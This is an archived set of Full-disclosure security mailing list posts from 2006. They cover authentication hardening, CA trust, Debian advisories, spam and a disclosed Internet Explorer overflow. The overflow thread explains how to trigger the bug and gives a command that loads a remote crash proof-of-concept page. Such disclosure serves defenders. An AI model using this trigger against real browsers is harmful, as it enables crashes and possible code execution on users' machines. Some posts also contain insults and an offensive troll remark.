Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Yahoo recommends you write down account information

2006-03-17 Thread bigdaddyzeroday
Do you blow everything out of proportion like this?  How old must 
you be to have this attitude?

On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group 
<[EMAIL PROTECTED]> wrote:
>You're Yahoo's top security advisor, who I talk to every day off 
>the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON 
>ONLINE FORMS?
>   
>  I think you're missing the point. The account information YAHOO 
>ask users to print out is the ACTUAL information on the users 
>ACCOUNT table.
>   
>  SURE, folks can type COMPLETE crap in their registration for 
>signing up to a Yahoo account, but whatever information is 
>submitted to the Yahoo account, it is the TRUE information that 
>would give access to that account.
>   
>  SO, no matter the trend of users giving BOGUS information to 
>sign up for an account, the only people who would print out 
>information is people who would have submitted TRUE information. 
>Otherwise, why would they print out info they knew was bogus?
>   
>  MARK, you're Yahoo's top security advisor, and I respect you off 
>the record, but coming on here trying to defend Yahoo's sec pros 
>for getting it totally wrong in their CONTRADICTION between sites 
>is totally wrong.
>   
>  Yahoo said the wording  "DON'T WRITE DOWN YOUR PASSWORD" but on 
>the registration procedure it says "YAHOO RECOMMEND YOU WRITE 
>DOWN YOUR ACCOUNT INFORMATION"
>   
>  YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A 
>CORPORATION GOT IT WRONG.
>   
>  I speak to you every day off list, but going off on your own 
>crusade won't make the rest of the Yahoo security team like you 
>better.
>   
>  SEE YOU OFF LIST SEIDEN.
>   
>  Sorry to everyone else, this is part of an off list argument 
>that Yahoo's top advisor can't get a grip of.
>   
>  (How did you become Yahoo's top security advisor? :P)
>  SEE YOU OFF LIST
>  Bye
>   
>   
>   
>   
>  [EMAIL PROTECTED] wrote:
>a certain number of people lie about their birthdate and 
>zipcode, or
>they forget just what they lied about, or move from place to
>place and forgot where they lived when they registered, 
>and they don't have a working alternate email address.
>




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Yahoo recommends you write down account information

2006-03-17 Thread bigdaddyzeroday
Banks in my country do not have a printout, even on the web page when doing 
banking, just 4 digits.

On Thu, 16 Mar 2006 09:57:17 -0800 [EMAIL PROTECTED] wrote:
>On Thu, 16 Mar 2006 06:21:14 PST, n3td3v group said:
>> The issue of printouts isn't a problem for home users as the 
>other poster
>> mentioned, The threat comes more in small business and large 
>corporations.
>
>Actually, the issue of printouts *is* a problem for home users - 
>dumpster diving
>is a major source of identity theft.  The single biggest leakage 
>is all those
>credit card applications you turned down, just due to the sheer 
>volume.  However,
>if the diver can score a printout from your online banking, 
>they're probably golden,
>because then they have name, address, and probably account number 
>all right there.




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] HTTP AUTH BASIC monowall

2006-03-17 Thread Tim
Hi,

> Don't get me wrong, there's obvious value in the certificate system.  
> Because I waxed philosophical about webs of trust doesn't mean I want to 
> throw the baby out with the bathwater.  :)

Heh, ok, we're on the same page then.  I was referring to the PGP web of
trust, since I'm not familiar with the marketing of the SSL one.  Indeed
you are right that people associate the wrong kind of trust with even
what the SSL PKI provides, and we agree that what it does provide is
fragile.

cheers,
tim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread Hariharan

This does not repro on IE7 though

-Hariharan

- Original Message - 
From: "Michal Zalewski" <[EMAIL PROTECTED]>

To: "Daniel Bonekeeper" <[EMAIL PROTECTED]>
Cc: ; <[EMAIL PROTECTED]>; 


Sent: Friday, March 17, 2006 2:43 AM
Subject: Re: Remote overflow in MSIE script action handlers (mshtml.dll)



On Thu, 16 Mar 2006, Daniel Bonekeeper wrote:

> BTW, tested the POC on MSIE (File Version = 6.00.2900.2180
> (xpsp_sp2_rtm.040803-2158)) with mshtml.dll (6.00.2900.2802
> (xpsp_sp2_gdr.051123-1230)) and it didn't work.

Daniel followed up with me in private and confirmed that the PoC *did*
work for him when he followed certain additional instructions: because the
attack depends on memory layout and usage, to get consistent results, be
sure to close *all* MSIE windows, then go to Start -> Run... and type:

 iexplore http://lcamtuf.coredump.cx/iedie.html

That should crash the browser immediately, because there are no other
buffers nearby to "absorb" the initial fencepost. Still, if no dice, try
hitting 'Reload' a couple of times.

/mz 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] RE: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread David Schenz
Tested on Win2k3 Standard, fully patched... 

Mshtml.dll 6.0.3790.2577
Iexplore.exe 6.0.3790.1830

PoC does work.


David Schenz
[EMAIL PROTECTED]

-Original Message-
From: Michal Zalewski [mailto:[EMAIL PROTECTED] 
Sent: Thursday, March 16, 2006 4:14 PM
To: Daniel Bonekeeper
Cc: bugtraq@securityfocus.com; [EMAIL PROTECTED];
full-disclosure@lists.grok.org.uk
Subject: Re: Remote overflow in MSIE script action handlers (mshtml.dll)

On Thu, 16 Mar 2006, Daniel Bonekeeper wrote:

> BTW, tested the POC on MSIE (File Version = 6.00.2900.2180
> (xpsp_sp2_rtm.040803-2158)) with mshtml.dll (6.00.2900.2802
> (xpsp_sp2_gdr.051123-1230)) and it didn't work.

Daniel followed up with me in private and confirmed that the PoC *did*
work for him when he followed certain additional instructions: because the
attack depends on memory layout and usage, to get consistent results, be
sure to close *all* MSIE windows, then go to Start -> Run... and type:

  iexplore http://lcamtuf.coredump.cx/iedie.html

That should crash the browser immediately, because there are no other
buffers nearby to "absorb" the initial fencepost. Still, if no dice, try
hitting 'Reload' a couple of times.

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread Tomasz Onyszko

Michal Zalewski wrote:

  iexplore http://lcamtuf.coredump.cx/iedie.html


In this way it works on IE7 Beta as well

--
Tomasz Onyszko
http://www.w2k.pl/blog/ - (PL)
http://blogs.dirteam.com/blogs/tomek/ - (EN)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread Daniel Bonekeeper
BTW, tested the POC on MSIE (File Version = 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158))
with mshtml.dll (6.00.2900.2802 (xpsp_sp2_gdr.051123-1230)) and it didn't work.
 
On 3/16/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
> Good morning,
>
> This might not come as a surprise, but there appears to be a *very*
> interesting and apparently very much exploitable overflow in Microsoft
> Internet Explorer (mshtml.dll).
>
> This vulnerability can be triggered by specifying more than a couple
> thousand script action handlers (such as onLoad, onMouseMove, etc) for any
> single HTML tag. Due to a programming error, MSIE will then attempt to
> write to a memory array out of bounds, at an offset corresponding to the ID of
> the script action handler multiplied by 4 (due to 32-bit address clipping,
> the result is a small positive integer).
>
> The list of IDs can be found on the Web, and is as follows (values in
> parentheses = resulting offsets):
>
>  (+0x45df4) (+0x45de0) (+0x45de4) (+0x45dd8) (+0x45dd4)
>  (+0x45ddc) (+0x45dcc) (+0x45dc8) (+0x45dd0) (+0x45dc4) (+0x45dc0)
>  (+0x45e24) (+0x45e18) (+0x45e08) (+0x45e0c) (+0x45e4c) (+0x45e54)
>
> What happens next depends on the structure of the page in which the
> malicious tag is embedded, as well as previously visited page and
> previously initialized extensions (all these factors can be controlled by
> the attacker).
>
> When the offending page contains no additional elements, and the user is
> not redirected from elsewhere, the browser will typically crash
> immediately, because there is no allocated memory at the resulting offset.
> In all other cases, crashes will typically occur later, due to attempted
> use of unrelated but corrupted in-memory buffers - for example, when the
> user attempts to leave or reload the page. Another good example is coming
> from a page that contains Macromedia Flash - this usually causes the Flash
> plugin itself to choke on corrupted memory on cleanup.
>
> For non-believers, there's a short but fiery demonstration page available
> at http://lcamtuf.coredump.cx/iedie.html (yes, it will probably crash your
> browser).
>
> Tested on MSIE 6.0.2900.2180.xpsp2.040806-1825 on Windows XP SP2. As far
> as I can tell, other browser makes (Firefox, Opera) are not susceptible to
> this attack.
>
> I eagerly await due reprimand from Microsoft for not disclosing this
> vulnerability in a manner that benefits them most, not passing start, not
> collecting $200 (from iDefense?).
>
> Regards,
> /mz
> http://lcamtuf.coredump.cx/silence/
>
> -- What this world needs is a good five-dollar plasma weapon.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall

2006-03-17 Thread Brian Eaton
On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> On Wed, 15 Mar 2006 15:14:47 EST, Brian Eaton said:
> > tim-security at sentinelchicken.org wrote:
>
> > How trustworthy are the CA certificates included in the average browser?
> >
> > There are a couple of dozen CA certificates shipped with my browser.
> > Some of the vendors associated with these CA certificates offer to
> > give me a certificate for my web site in 10 minutes or less for a
> > couple of hundred dollars.
> >
> > This sounds like a really ripe opportunity for social engineering to me.
>
> Been there, done that already.  There was a phishing run a while ago,
> the guys even had a functional SSL cert for www.mountain-america.net (the
> actual bank was mntamerica.net or something like that..)
>
> Only real solution there is to get a good grip on what a CA is actually
> certifying, which is a certain (usually very minimal) level of
> *authentication*. They're certifying that somebody convinced them that the 
> cert
> was for who they claimed it was for.  That's it.  Anybody who attaches any
> *other* meaning to it is making a big mistake.  In particular, "authorization"
> is totally out-of-scope here
>
> "You are now talking to the site that one of the CAs you trust thinks belongs
> to Frobozz, Inc.".
>
> If you don't trust that CA's judgment, you better heave their root cert 
> overboard...
>

Brian Krebs from the Washington Post wrote a column about the Mountain
America scam, and he even got somebody from Geotrust to comment on
what went wrong.

The column is here:
http://blog.washingtonpost.com/securityfix/2006/02/the_new_face_of_phishing_1.html

Here's the section of the article that has Geotrust's response:

Joan Lockhart, the company's vice president of marketing, said the
site was registered on Sunday and the cert was issued early this
morning. Lockhart said Geotrust has a rigorous process in place to
check for phishy certificate requests that relies on algorithms which
check cert requests for certain words, misspellings or phrases that
may indicate a phisher is involved. In this case, she said, the
technology did not flag the request because there was nothing in the
Internet address to indicate the site was at all related to a
financial institution.

Geotrust's cert verification process is largely automated: when
someone requests a cert for a particular site, the company sends an
e-mail to the address included in the Web site's registrar records,
along with a special code that the recipient needs to phone in to
complete the process.

Lockhart said she doubted that inserting a human into that process
would have flagged the account as suspicious.

"I would argue that probably anyone who is processing
mountain-america.net would not have raised flags," she said.


My read of that statement is that Geotrust sees nothing wrong with
their verification process and is not going to take any action to
prevent this from happening again.

The incentives for the CAs are in all the wrong places.  They suffer
no financial harm when they certify a false identity.  Instead, they
make a quick buck.

- Brian

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Brian Eaton
Simon Smith simon at snosoft.com wrote
> My first thought was on how to harden the
> authentication because the basic auth didn't cut it for me. That's what I
> am looking for ideas for.

Here are some things to start with:

Client certificates.
Kerberos.
Two-factor authentication.

Unfortunately with web applications you not only need to worry about
the initial authentication, but how the session is maintained.  If the
session is maintained using cookies, all the strong authentication in
the world won't save you from having that session hijacked.

- Brian

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Felix Lindner
Hi,

On Thu, 16 Mar 2006 09:48:07 -0500
Simon Smith <[EMAIL PROTECTED]> wrote:
> My first thought was on how to harden the
> authentication because the basic auth didn't cut it for me. That's what I
> am looking for ideas for.

you may be looking for Digest Authentication:
http://www.ietf.org/rfc/rfc2617.txt:

   "Like Basic, Digest access authentication verifies that both parties
   to a communication know a shared secret (a password); unlike Basic,
   this verification can be done without sending the password in the
   clear, which is Basic's biggest weakness. As with most other
   authentication protocols, the greatest sources of risks are usually
   found not in the core protocol itself but in policies and procedures
   surrounding its use."

cheers
FX

-- 
SABRE Labs | Felix 'FX' Lindner <[EMAIL PROTECTED]> 
http://www.sabre-labs.com  | +49 171 7402062
   | A740 DE51 9891 19DF 0D05  
   | 13B3 1759 C388 C92D 6BBB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
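The Digest exchange FX points to, worked through as an added example (not code from the thread, from m0n0wall or from the RFC): the client computes the RFC 2617 response for qop=auth, and the server, which keeps only HA1 rather than the password, verifies it, rejects nonces it never issued and refuses a replayed nonce count. The realm name, credentials and request path are constructed for the demo; `rfc2617_example` recomputes the worked example from RFC 2617 section 3.5.

```python
import hashlib
import hmac
import secrets
import time

REALM = "monowall-demo"  # constructed realm name, not m0n0wall's real one


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the only secret the server keeps."""
    return md5_hex(f"{username}:{realm}:{password}")


def digest_response(ha1_value, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 section 3.2.2 response for qop=auth; no password on the wire."""
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1_value}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def rfc2617_example():
    """Recompute the worked example from RFC 2617 section 3.5 (user Mufasa)."""
    return digest_response(ha1("Mufasa", "testrealm@host.com", "Circle Of Life"),
                           "GET", "/dir/index.html",
                           "dcd98b7102dd2f0e8b11d0f600bfb0c093",
                           "00000001", "0a4f113b")


class DigestServer:
    """Minimal server side: issues nonces, stores HA1 per user, verifies."""

    def __init__(self, realm, nonce_ttl=300):
        self.realm = realm
        self.nonce_ttl = nonce_ttl
        self.users = {}    # username -> HA1
        self.nonces = {}   # nonce -> [issued_at, highest nc accepted]

    def add_user(self, username, password):
        self.users[username] = ha1(username, self.realm, password)

    def challenge(self):
        """WWW-Authenticate parameters; the nonce is random and remembered."""
        nonce = secrets.token_hex(16)
        self.nonces[nonce] = [time.time(), 0]
        return {"realm": self.realm, "qop": "auth", "nonce": nonce,
                "algorithm": "MD5"}

    def verify(self, method, auth):
        """Check a parsed Authorization header; False on any failure."""
        entry = self.nonces.get(auth.get("nonce"))
        if entry is None:
            return False                     # nonce was never issued here
        issued, last_nc = entry
        if time.time() - issued > self.nonce_ttl:
            del self.nonces[auth["nonce"]]   # stale; client must re-authenticate
            return False
        try:
            nc = int(auth.get("nc", ""), 16)
        except ValueError:
            return False
        if nc <= last_nc:
            return False                     # replay of an earlier request
        stored = self.users.get(auth.get("username"))
        if stored is None:
            return False
        expected = digest_response(stored, method, auth.get("uri", ""),
                                   auth["nonce"], auth.get("nc", ""),
                                   auth.get("cnonce", ""),
                                   auth.get("qop", "auth"))
        if not hmac.compare_digest(expected, auth.get("response", "")):
            return False
        entry[1] = nc                        # remember the highest nc seen
        return True


def client_authorization(username, password, method, uri, challenge, nc,
                         cnonce):
    """The Authorization parameters a browser would send back."""
    h = ha1(username, challenge["realm"], password)
    return {"username": username, "realm": challenge["realm"],
            "nonce": challenge["nonce"], "uri": uri, "qop": "auth",
            "nc": nc, "cnonce": cnonce,
            "response": digest_response(h, method, uri, challenge["nonce"],
                                        nc, cnonce)}


def demo():
    """Good login, replay of the same request, wrong password -> [T, F, F]."""
    server = DigestServer(REALM)
    server.add_user("admin", "demo-pass-123")  # constructed credentials
    ch = server.challenge()
    good = client_authorization("admin", "demo-pass-123", "GET",
                                "/index.php", ch, "00000001",
                                secrets.token_hex(4))
    bad = client_authorization("admin", "wrong-pass", "GET", "/index.php",
                               ch, "00000002", secrets.token_hex(4))
    assert "demo-pass-123" not in repr(good)  # password never leaves the client
    return [server.verify("GET", good), server.verify("GET", good),
            server.verify("GET", bad)]


if __name__ == "__main__":
    print(demo())
```

As the RFC text FX quotes warns, the surrounding policy still matters: MD5 HA1 values stolen from the server are directly usable against that realm, and nothing here protects the session that follows authentication.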


[Full-disclosure] [SECURITY] [DSA 1006-1] New wzdftpd packages fix arbitrary shell command execution

2006-03-17 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1006-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
March 16th, 2005                        http://www.debian.org/security/faq
- --

Package: wzdftpd
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2005-3081

"kcope" discovered that the wzdftpd FTP server lacks input sanitising
for the SITE command, which may lead to the execution of arbitrary
shell commands.

The old stable distribution (woody) does not contain wzdftpd packages.

For the stable distribution (sarge) this problem has been fixed in
version 0.5.2-1.1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.5.5-1.

We recommend that you upgrade your wzdftpd package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 


[Full-disclosure] [SECURITY] [DSA 1005-1] New xine-lib packages fix arbitrary code execution

2006-03-17 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1005-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
March 16th, 2006                        http://www.debian.org/security/faq
- --

Package: xine-lib
Vulnerability  : buffer overflow
Problem-Type   : local (remote)
Debian-specific: no
CVE ID : CVE-2005-4048
Debian Bug : 342208

Simon Kilvington discovered that specially crafted PNG images can trigger
a heap overflow in libavcodec, the multimedia library of ffmpeg, which may
lead to the execution of arbitrary code.
xine-lib includes a local copy of libavcodec.

The old stable distribution (woody) isn't affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 1.0.1-1sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 1.0.1-1.5.

We recommend that you upgrade your xine-lib package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 


[Full-disclosure] [SECURITY] [DSA 1004-1] New vlc packages fix arbitrary code execution

2006-03-17 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1004-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
March 16th, 2006                        http://www.debian.org/security/faq
- --

Package: vlc
Vulnerability  : buffer overflow
Problem-Type   : local (remote)
Debian-specific: no
CVE ID : CVE-2005-4048
Debian Bug : 342208

Simon Kilvington discovered that specially crafted PNG images can trigger
a heap overflow in libavcodec, the multimedia library of ffmpeg, which may
lead to the execution of arbitrary code.
The vlc media player links statically against libavcodec.

The old stable distribution (woody) isn't affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 0.8.1.svn20050314-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.8.4.debian-2.

We recommend that you upgrade your vlc package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 


Re: [Full-disclosure] HTTP AUTH BASIC monowall

2006-03-17 Thread bkfsec

Tim wrote:

> I think you are lumping several types of trust into one.  (Though please
> correct me if I'm wrong.)

My discussion was meant solely to discuss the "web of trust" as it 
relates to SSL Cert Authorities, which was the scope of my message.  I 
wouldn't refer to the PGP "web of trust" as having the same issues 
because, as you accurately point out, the two methods of trust are 
different.


And, again, as you accurately point out, the reason why SSL cert trust 
is flawed is the distinction of "forced trust"... meaning that in the 
SSL cert game, you have to trust the CAs whereas in PGP trust you're 
actually trusting someone you know and deciding on trust in a more 
granular fashion.





> So, I argue the two-parameter, trust-degrading system OpenPGP uses fails
> much more gracefully than SSL's PKI.  I can ultimately trust that your
> key is really yours, but I don't have to trust that you'll properly
> verify others' keys.  As we follow the transitive chain of trust, the
> trust decreases.


And I would agree with you completely.


> People really do operate in webs like this.  Obviously verifying
> identities yourself is safer, but if your buddy tells you someone is
> legit, you will likely trust that at least a little (and with PGP, you
> can trust that referral as much or little as you like, without telling
> your buddy how much you trust him).

Yes, they do... it's where the whole thing becomes automated and 
"submerged" (as it is with SSL) that things become flawed.  Some people 
tend to ratchet the web of trust onto SSL in an attempt to show that it 
is verifiable ("the CAs would NEVER falsely identify an organization 
because then you'd NEVER trust them", etc...) and that's where the 
mistake is made.


There's some truth to the statement that CAs want to avoid falsely 
certifying organizations... but the problem is that people assume that 
they're detectives at verifying business practice and that is not the 
case.  It's just not in the scope of what they do.  They're in the 
business of verifying identity and providing certificates for 
cryptographic usage... no more, no less. :)



> Please tell me how this is worse than all-or-nothing CA trust in SSL.
> (Besides issues with usability.)

It's not at all worse... it's just that people apply the wrong level of 
consideration to certificates sometimes and this ends with the result of 
giving people a false sense of security when they see that little 
padlock at the bottom of their screen.


Don't get me wrong, there's obvious value in the certificate system.  
Because I waxed philosophical about webs of trust doesn't mean I want to 
throw the baby out with the bathwater.  :)


-bkfsec


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
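Tim's "two-parameter, trust-degrading" point, worked through as an added example (not code from either poster): a simplified GnuPG-style validity calculation in which ownertrust is the parameter only I set and validity is what signatures earn. The thresholds are GnuPG's defaults; the key names and keyrings are constructed.

```python
MARGINALS_NEEDED = 3   # GnuPG default --marginals-needed
COMPLETES_NEEDED = 1   # GnuPG default --completes-needed
MAX_CERT_DEPTH = 5     # GnuPG default --max-cert-depth


def compute_validity(me, signatures, ownertrust):
    """Return {key: "full" | "marginal" | "unknown"} for every signed key.

    signatures: {signed_key: set(signer_keys)}  -- who certified whom
    ownertrust: {key: "ultimate" | "full" | "marginal"} -- how far I trust
                the *owner* to verify others; unrated keys are "unknown"
    """
    validity = {me: "full"}   # my own key is valid by definition
    depth = {me: 0}           # hops from my key along the introducer chain
    for _ in range(MAX_CERT_DEPTH + 1):   # enough rounds to reach the depth cap
        changed = False
        for key, signers in signatures.items():
            if validity.get(key) == "full":
                continue                  # already settled
            full = marginal = 0
            best_depth = None
            for s in signers:
                # An introducer must be BOTH fully valid (parameter 1, earned
                # through signatures) AND rated by me (parameter 2, my own
                # decision). A valid key whose owner I never rated introduces
                # nobody, which is what stops trust from being "forced".
                if validity.get(s) != "full" or depth[s] >= MAX_CERT_DEPTH:
                    continue
                ot = ownertrust.get(s, "unknown")
                if ot in ("ultimate", "full"):
                    full += 1
                elif ot == "marginal":
                    marginal += 1
                else:
                    continue
                hop = depth[s] + 1
                best_depth = hop if best_depth is None else min(best_depth, hop)
            if full >= COMPLETES_NEEDED or marginal >= MARGINALS_NEEDED:
                validity[key] = "full"
                depth[key] = best_depth
                changed = True
            elif (full or marginal) and validity.get(key) != "marginal":
                validity[key] = "marginal"   # some evidence, below threshold
                changed = True
        if not changed:
            break
    for key in signatures:
        validity.setdefault(key, "unknown")
    return validity


def thread_example():
    """Constructed keyring mirroring the argument in the thread."""
    signatures = {
        "alice": {"me"},
        "bob": {"alice"},                    # alice vouches for bob
        "carol": {"bob"},                    # bob vouches for carol
        "dave": {"me"}, "erin": {"me"}, "frank": {"me"},
        "grace": {"dave", "erin", "frank"},  # three marginal introducers
        "heidi": {"dave", "erin"},           # only two
    }
    ownertrust = {
        "me": "ultimate",
        "alice": "full",        # I trust alice's vetting completely
        # bob is never rated: I trust that his key is his, not his vetting,
        # so carol gets nothing from him even though bob's key is valid
        "dave": "marginal", "erin": "marginal", "frank": "marginal",
    }
    return compute_validity("me", signatures, ownertrust)


def deep_chain_example():
    """A chain of fully trusted introducers still stops at MAX_CERT_DEPTH."""
    keys = ["k%d" % i for i in range(1, 8)]
    signatures = {k: {prev} for prev, k in zip(["me"] + keys, keys)}
    ownertrust = {k: "full" for k in ["me"] + keys}
    return compute_validity("me", signatures, ownertrust)
```

Contrast this with a CA root in the browser store: once the root is trusted, every certificate chained below it is fully valid at any depth, with no per-issuer rating and no degradation.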


Re: [Full-disclosure] Filtering Latest Spam Run (radio.toad.com)

2006-03-17 Thread Damian Gerow
Thus spake Jason Coombs ([EMAIL PROTECTED]) [16/03/06 04:33]:
: uh huh, and now we know the spam kiddie responsible. I pay by the KB to 
: receive all your junk, so you can expect a lawsuit in the near future.

You pay by the KB and subscribe to FD?



[Full-disclosure] Generically Determining the Presence of Virtual Machines

2006-03-17 Thread valsmith
At OffensiveComputing we were looking at ways to detect virtual machines and had found and discarded many unsophisticated methods, such as looking for VMWare Tools running as a service or VMWare-related registry keys, etc. Then we discovered Joanna Rutkowska's very interesting "Redpill" method. This was an eye-opening work for us. After spending a little time playing with it we realized it wasn't foolproof on multiprocessor systems, so we decided to research the problems and possible ways to improve on the method. We discovered and implemented an improved method which is presented in this paper.
http://www.offensivecomputing.net
V.

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Andrew Simmons

Simon Smith wrote:

> Ok, so what's your alternative?

[...]

> Some form of challenge response?  If you can already perform a man in
> the middle attack, then challenge response is just as vulnerable.
> Just connect to the server when the client hits you, and pass them the
> challenge you received.  Use the credential yourself, and pass them a
> failure.  When they try again, connect them to the server.
>
> You're right again.  Does everyone here think that the majority of
> companies hire security aware people?


We're not talking about general staff, we're talking about your firewall 
admin. If your firewall admin doesn't care about security you've got 
much bigger problems. Which appears to be the case...



\a

--
Andrew Simmons // MessageLabs Security Team
Technical Security Consultant
MessageLabs: Be certain

__
This email has been scanned by the MessageLabs Email Security System.
For more information please visit http://www.messagelabs.com/email 
__




Re: [Full-disclosure] Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=% Buffer Overflow in Microsoft Access

2006-03-17 Thread leToff
Dave Korn wrote :

>  I don't see how you could tell from that received header whether the 
>machine is a proxy, or whether it originated the traffic itself.
>
>
Simply because I sent that message myself using telnet connected to the
1st MX of toad.com (not tested the 2nd). It's so easy to verify by
yourself that I don't understand why you don't trust me.

BTW, Open Relay is probably more appropriate to define this machine.

-- 
leToff



Re: [Full-disclosure] -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006= % Buffer Overflow in Microsoft Access

2006-03-17 Thread Michael Holstein

> Well, by default, Tor doesn't allow port 25 out of exit nodes. In
> this case however, not only has the operator opened up port 25 out,
> effectively making it an open relay, but he's actively sniffing and
> publishing exit node traffic - apparently under the misguided belief
> that it makes him appear terribly clever.


Uh huh .. which is why those of us that use TOR do this in our 
/etc/tor/torrc :


excludenodes jackass1,jackass2, etc



[Full-disclosure] Re: SSH Scans - Homebrew dictionary

2006-03-17 Thread Dave Korn
"PERFECT.MATERIAL" <[EMAIL PROTECTED]> wrote in message
> Michel,
>
> I highly doubt any Brazilian citizen would be involved with such
> malicious behavior. Please rescind your inflammatory and racist
> statement or risk gaining a reputation as a person who dislikes his
> fellow brown person. It's because of people like you that Eazy-E died
> of AIDS.
>
> PERFECT.MATERIAL


  Say, don't I remember you from teh flonk a few years back?

cheers,
  DaveK
-- 
Can't think of a witty .sigline today





Re: [Full-disclosure] What about subscriber only?

2006-03-17 Thread Line Noise
On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> On Thu, 16 Mar 2006 21:32:11 +0100, Stefan Triller said:
> > What about closing this list for email adresses which aren't subscribed to 
> > it?
> > This would minimize the spam.
>
> Actually, it wouldn't, because the From: addresses are, for the most part,
> forged to show people who are actual subscribers - probably trawled out of
> a list archive.

Oh, that's definite and for sure. I unsubscribed from the list some
time ago, and resubscribed with a good old gmail account (thank you
google), which means that this moronic run against FD was something I
could just ignore (except for the work of deleting them). I received
an email from FD about "Post by non-member to a members-only list" and
suggesting I either wait patiently for moderator approval, or log on
and kill it. I was happy to do so (although I'm very sorry for John,
who must be drowning in that crap).

> Full-Disclosure - We believe in it.

I still do. Keep the faith, John.

--

NO CARRIER



Re: [Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Simon Smith
Mike,
I just had to respond to you.

Mike Owen wrote:
> On 3/16/06, Simon Smith <[EMAIL PROTECTED]> wrote:
>   
>> Flames like yours are useless. If you do not know how to answer the
>> question that I am asking, then just be quiet. Mark Coleman is one of
>> the few people that seems to have understood my question and provided me
>> with a viable solution. Again, thanks Mark!
>>
>> 
>
> Adriel or Simon or whatever the hell you're calling yourself these days,
>
>   
My real name is Alex Baxter, so feel free to call me Alex

> You're asking a bullshit question. 
Well they say that you catch flies with shit... seems to have caught you. ;]
> You're basically saying that ssl is
> broken, so you want to tunnel something through ssl that'll be secure
> if the ssl wasn't there. Don't fucking use ssl in the first place then
> if you don't like it.
>   
I'm not basically saying that SSL is broken, you're just not bright
